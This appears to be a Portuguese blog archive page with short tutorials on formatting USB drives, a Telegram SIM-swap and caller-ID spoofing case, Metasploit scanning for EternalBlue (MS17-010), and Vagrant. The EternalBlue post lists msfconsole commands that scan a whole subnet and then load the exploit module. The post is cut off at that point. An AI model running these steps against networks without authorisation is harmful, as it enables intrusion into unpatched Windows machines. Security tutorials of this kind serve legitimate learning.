Postagens

Mostrando postagens de Janeiro, 2020

Como formatar um pen drive no Linux

Primeiro vamos identificar nosso pendrive com o comando mount A saida do comando sera portal on /run/user/1000/doc type fuse.portal (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000) tmpfs on /run/snapd/ns type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1626292k,mode=755) nsfs on /run/snapd/ns/whatsdesk.mnt type nsfs (rw) /dev/sdb1 on /media/junior/538B-BA22 type vfat (rw,nosuid,nodev,relatime,uid=1000,gid=1000,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,showexec,utf8,flush,errors=remount-ro,uhelper=udisks2) Assim que identificamos (no meu caso foi o /dev/sdb1) iremos desmontar o pendrive sudo umount /dev/sdb1 Para o sistema de arquivos vFAT (FAT32) sudo mkfs.vfat /dev/sdc1 Para sistema de arquivos NTFS sudo mkfs.ntfs /dev/sdc1 Para o sistema de arquivos EXT4 sudo mkfs.ext4 /dev/sdc1 Agora vamos criar nosso pendrive com um vmware (como exemplo) sudo dd if=/home/junior/Downloads/isos/vmware7.iso of=/dev/sdb status=progress && sync

Celular hackeado (Telegram)

PREMISSA: TODO CONTEUDO ABAIXO SERVE APENAS PARA FINS ACADÊMICOS E ENTENDIMENTO DO QUE ACONTECEU COM O "CLONE" DA LINHA. Celular hackeado (Telegram) SIM Swap Operação Spoofing Objetivo Acessar as contas de Telegram das vitimas Procedimento de login 1. numero de telefone que envia um SMS vai acessar o login 2. caso falhe receber uma ligação Acessar as caixas postais das vitimas Ligar para seu próprio numero Caller ID Spoofing ** esse e o cara!!! Camuflagem do remetente --> Manipulação de uma informação dentro da telefonia Caller ID (identificativo de quem esta ligando) Software VOIP Deixar o telefone ocupado DEIXAR CLARO QUE: 1. Falha foi das operadoras (sem senhas) acesso a caixa postal; 2. Telegram das vitimas (não acessou os dados do celular); O que fazer para me proteger? Ativar a autenticação de dois fatores

Varredura na Rede (para detectar o eternalblue)

Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue. A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado https://www.kali.org/downloads/ Comandos dentro do Kali Linux # service postgresql start # msfconsole msf5 > search smb_ms17_010 msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24 msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100 msf5 auxiliary(scanner/smb/smb_ms17_010) > run Quando a vulnerabilidade for identificada teremos a saida "Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86" msf5 auxiliary(scanner/smb/smb_ms17_010) > back msf5 > search ms17_010_eternalblue msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternal

Conhecendo o Vagrant

Imagem
Olá hoje vamos falar de um assunto muito importante para você sysadmin ou desenvolver que precisa de agilidade. O Vagrant é um projeto que permite virtualizar o ambiente de desenvolvimento de forma simples. Premissa ter um bare metal (VirtualBox, Vmware, Hypervisor) https://www.virtualbox.org/ (é o que eu utilizo no dia a dia) Site Vagrant para Download https://www.vagrantup.com/downloads.html Download pela própria distribuição Linux (de boa preferência eu estou usando o Debian Buster 10) $ sudo apt-get install vagrant -y Vagrant Box (maquinas prontas) Criar um diretório (de sua preferência onde vai criar suas vm's) Para instalar os boxes (Discover Vagrant Boxes) $ vagrant box add centos/7 (com esse comando ele vai instalar o centOS) Após o processo de download da máquina veja a saída do arquivo Listando as maquinas $ vagrant box list Criando a VM (veja a saída do arquivo) $ vagrant init Arquivo de configuração (similar ao dockerfile) $ vim Va